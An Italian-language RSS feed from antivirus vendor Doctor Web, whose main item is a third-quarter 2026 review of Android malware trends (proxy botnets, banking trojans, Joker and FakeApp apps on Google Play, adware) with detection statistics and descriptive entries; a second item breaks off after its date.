<?xml version="1.0"?>
<rss version="2.0"><channel><title>Tutte le notizie</title><link>https://news.drweb-av.it/news/</link><description>Notizie della società Doctor Web - Tutte le notizie</description><image><url>https://st.drweb.com/static/drweb_logo_it.gif</url><link>https://news.drweb-av.it/news/</link><title>Antivirus Dr.Web</title></image><item><guid>https://news.drweb-av.it/show/?i=15305&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in III trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15305&amp;lng=it&amp;c=5</link><pubDate>Thu, 01 Oct 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 ottobre 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2026 si osservava un'impennata dell'attività delle applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, che consentono ai cybercriminali di reindirizzare il traffico di rete attraverso i dispositivi delle vittime e anonimizzare la propria connessione internet. La crescita è principalmente dovuta ai trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt;, che rappresentano complessivamente oltre il 22% di tutti i rilevamenti dei software malevoli. Questi trojan aggiungono i dispositivi infettati a botnet proxy e trasformano ciascuno di essi in un nodo di uscita della rete proxy corrispondente.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Rispetto al II trimestre, il numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; è leggermente aumentato, e queste applicazioni malevole, con la quota del 18,06%, si sono collocate alla seconda posizione. Come anche in precedenza, sono stati i più attivi tra questi trojan i campioni della sottofamiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, che sono in grado, tra l'altro, di intercettare il contenuto dei messaggi SMS e delle notifiche al fine di rubare i codici di conferma monouso delle operazioni bancarie.&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, gli utenti riscontravano meno spesso i trojan pubblicitari delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Il loro numero di rilevamenti negli ultimi 3 mesi di nuovo è diminuito: del 30,96% e del 14,36% rispettivamente, mentre la loro quota complessiva tra i software malevoli rilevati al momento non supera il 10%.&lt;/p&gt;

&lt;p&gt;Tra i software potenzialmente pericolosi, hanno mantenuto la leadership i programmi in cui tramite gli strumenti hacker per il modding NP Manager è aggiunto un codice spazzatura che confonde la logica delle applicazioni. Gli autori di virus utilizzano questa tecnica per proteggere i software malevoli dagli antivirus. Come esempio, essa viene attivamente adoperata per la protezione dei trojan bancari &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Nel III trimestre, tali varianti (rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;) hanno rappresentato il 69,01% dei rilevamenti delle applicazioni potenzialmente pericolose.&lt;/p&gt;

&lt;p&gt;La seconda posizione di nuovo è stata occupata dai programmi che vengono modificati con l'utilizzo di altre funzionalità di NP Manager. Ad esempio, i malintenzionati possono offuscare il codice dei trojan per proteggerli dal rilevamento e dall'analisi. La quota di tali mod (rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;) ha ammontato al 19,16% del numero totale dei rilevamenti dei software potenzialmente pericolosi. Chiudono la top tre dei leader i programmi modificati tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Questa utility scarica da internet script appositamente preparati che potrebbero rappresentare un pericolo potenziale in quanto possono essere creati da chiunque sia interessato, inclusi gli autori di virus. I programmi modificati in questo modo hanno rappresentato il 5,77% dei rilevamenti.&lt;/p&gt;

&lt;p&gt;Le applicazioni indesiderate più diffuse nel III trimestre sono rimaste i &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; — sono programmi che simulano il funzionamento degli antivirus. Avvisano gli utenti di aver rilevato determinate minacce, e per eseguire la "neutralizzazione" dell'infezione, suggeriscono di acquistare la versione completa dell'app. La percentuale di tali software sul numero complessivo dei rilevamenti dei programmi indesiderati, rispetto al periodo di osservazione precedente, è salita dal 44,10% al 51,09%.&lt;/p&gt;

&lt;p&gt;I software pubblicitari più diffusi sono stati i moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, che vengono incorporati in applicazioni Android. Nel III trimestre, essi hanno rappresentato il 39,46% dei rilevamenti delle minacce di questo tipo. Questi moduli visualizzano notifiche pubblicitarie che fuorviano gli utenti. Inoltre, raccolgono una serie di dati confidenziali.

&lt;/p&gt;

&lt;p&gt;Durante gli ultimi 3 mesi, si osservava una crescita dell'attività dei moduli pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; — la loro quota è aumentata dal 7,39% al 10,34%. Le più importanti tra di essi rimangono le varianti &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;. I moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; possono visualizzare notifiche pubblicitarie, banner e finestre a comparsa, e in particolare, i cybercriminali li utilizzano per la distribuzione dei programmi malevoli.&lt;/p&gt;

&lt;p&gt;Gli utenti hanno continuato a riscontrare gli &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, tuttavia, l'attività di questi programmi pubblicitari rispetto al II trimestre è diminuita: la loro quota è scesa dal 14,26% al 7,90%. Queste applicazioni vengono distribuite sotto le finte spoglie di programmi con cheat per l'ottenimento di varie risorse in giochi, ma in realtà, esse solo caricano siti con pubblicità. Sono diventati meno rilevanti anche le applicazioni, presenti tra i leader degli ultimi mesi, &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Hanno rappresentato il 5,73% dei rilevamenti dei software pubblicitari. Creano notifiche con messaggi fuorvianti che avvisano di presunti errori di sistema e memoria operativa insufficiente. E durante "l'ottimizzazione" visualizzano annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;Durante il III trimestre, gli specialisti del laboratorio antivirus dell'azienda Doctor Web hanno rilevato sullo store di app Google Play numerose nuove applicazioni malevole, tra cui decine dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi mobili a pagamento. Eseguendo l'analisi dei trojan, i nostri esperti hanno scoperto che gli autori di virus hanno ampliato le funzionalità della famiglia. Alcune nuove varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; ora sono in grado non solo di attivare abbonamenti, ma anche di trasformare i dispositivi infettati in nodi di uscita di una botnet proxy. Su Google Play venivano anche distribuiti ulteriori programmi falsificazione dalla famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono utilizzati in vari schemi fraudolenti.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;PRINCIPALI TENDENZE DI III TRIMESTRE&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Gli utenti dovevano affrontare un'alta attività dei programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, utilizzando i quali, i malintenzionati possono reindirizzare il traffico di rete attraverso i dispositivi delle vittime.&lt;/li&gt;
        &lt;li&gt;Si osservava una crescita del numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;È continuato il calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;Sullo store di app Google Play sono state rilevate decine di programmi malevoli.&lt;/li&gt;
        &lt;li&gt;Le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; hanno ricevuto una funzionalità che consente di trasformare i dispositivi infettati in nodi di uscita di una botnet proxy.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmi malevoli che trasformano i dispositivi infettati in nodi di uscita di botnet proxy e consentono ai malintenzionati di reindirizzare attraverso di essi il traffico di rete.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.SpyMax.17&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma malevolo spia che possiede ampie funzionalità. I cybercriminali lo utilizzano, tra l'altro, come un trojan bancario per l'intercettazione dei codici di verifica inviati dagli istituti di credito.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue, e in alcuni casi, vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza nel sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.263.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan bancario che intercetta gli SMS con codici monouso da istituti di credito, il contenuto di notifiche, nonché raccoglie altre informazioni confidenziali. Queste ultime includono dati tecnici sul dispositivo infetto, la lista di applicazioni installate, informazioni sulla scheda SIM, su chiamate ed SMS ricevuti e inviati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali applicazioni possono trarre in inganno gli utenti e segnalare minacce inesistenti, o identificare erroneamente applicazioni sicure come malevole. In alcuni casi, per la "neutralizzazione" delle presunte minacce rilevate, possono richiedere l'acquisto della versione completa del software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito, hanno una lista di sistemi di pagamento e banche più popolari, attraverso cui presumibilmente sarebbe possibile ritirare i premi. Ma anche quando gli utenti riescono ad accumulare la somma da ritirare sufficiente, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, il modificatore ottiene la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi Android in cui tramite strumenti hacker per il modding di applicazioni è aggiunto codice spazzatura. Tale modificazione viene eseguita allo scopo di confondere la logica dei programmi. Questa tecnica è spesso riscontrata nei trojan bancari e nelle versioni pirata di software.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
     &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli pubblicitari che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Applicazioni spacciate per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, sono creati per la visualizzazione di pubblicità. Questi programmi ricevono dal server remoto la configurazione, in base alla quale caricano un sito target con annunci: banner, finestre a comparsa, filmati ecc.&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Airpush&amp;lng=it"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
     &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Nel III trimestre 2026, gli specialisti del laboratorio antivirus Doctor Web hanno individuato oltre 50 applicazioni malevole sullo store di app Google Play. La maggior parte di esse appartiene alla famiglia dei programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che attivano di nascosto un abbonamento a servizi mobili a pagamento. Per fare ciò, rubano i codici di conferma monouso intercettando i messaggi SMS e il contenuto delle notifiche. Gli autori di virus distribuivano i trojan con il pretesto di vari software, tra cui programmi di messaggistica istantanea, utility di ottimizzazione del funzionamento dei dispositivi, programmi fotocamera, strumenti di riconoscimento del testo e lettori multimediali per la visione di film e serie TV online.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di applicazioni da Google Play che nascondevano al loro interno i trojan &lt;b&gt;Android.Joker&lt;/b&gt;: Special Camera — &lt;b&gt;Android.Joker.2679&lt;/b&gt;, Color Messages — &lt;b&gt;Android.Joker.2682&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Studiando i nuovi campioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, i nostri esperti hanno scoperto che in alcuni di essi è aggiunta una funzionalità che consente di trasformare i dispositivi infettati in nodi di uscita di una botnet proxy. I malintenzionati possono sfruttare questa funzionalità per vendere servizi di accesso a internet attraverso la rete delle vittime.&lt;/p&gt;

&lt;p&gt;L'analisi ha mostrato che uno dei server di comando e controllo della botnet non era protetto da autenticazione. Grazie a questo, gli analisti di virus Doctor Web hanno potuto ottenere dal pannello di controllo informazioni sulle statistiche del suo funzionamento, nonché su quello in quali applicazioni sono incorporati i moduli malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;. Secondo i dati della fine di agosto, risultavano infettati dai trojan della famiglia aggiornati oltre 187.000 dispositivi, e il numero di noleggi attivi della rete proxy illegale ammontava a 93.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Pannello di controllo web della botnet proxy basata sui dispositivi infettati da alcune varianti di &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Sono state rilevate anche nuove varianti dei programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che possono caricare vari siti, tra cui malevoli e fraudolenti. Venivano distribuiti sotto le finte spoglie di programmi per la gestione delle finanze e la pianificazione del bilancio familiare, applicazioni per l'organizzazione degli appunti, programmi per la ricerca di lavoro, nonché vari giochi. La maggior parte dei trojan, per mascherarsi, forniva effettivamente le funzionalità dichiarate, ma a determinate condizioni, i programmi malevoli caricavano, invece di questo, siti web fraudolenti.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Esempi di programmi malevoli falsificazione &lt;b&gt;Android.FakeApp&lt;/b&gt; rilevati dai nostri specialisti su Google Play nel III trimestre 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Come esempio, &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2022&lt;/b&gt; caricava un sito su cui veniva visualizzata una lista di "attuali offerte di lavoro" con stipendi elevati e condizioni di lavoro attraenti. In particolare, il design della risorsa internet fraudolenta utilizzava un logo nello stile e nei colori del logo ufficiale del portale dei servizi statali russo Gosuslugi. &lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Una delle offerte di lavoro presumibilmente disponibile alla potenziale vittima&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli utenti venivano invitati a scoprire i dettagli delle posizioni lavorative di loro interesse. Per farlo, dovevano inviare una richiesta, dopodiché presumibilmente potrebbero "iniziare a guadagnare subito". I malintenzionati chiedevano gli utenti di fornire le informazioni confidenziali, inclusi il nome e cognome, l'età, la cittadinanza e il numero di cellulare, nonché invitavano loro a scegliere un orario conveniente per ricevere una chiamata dallo "specialista".&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Il sito web caricato dal trojan raccoglie i dati personali che i truffatori potrebbero in seguito utilizzare per ingannare le loro vittime&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=15304&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in III trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15304&amp;lng=it&amp;c=5</link><pubDate>Thu, 01 Oct 2026 10:02:24 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 ottobre 2026&lt;/b&gt;&lt;/p&gt;

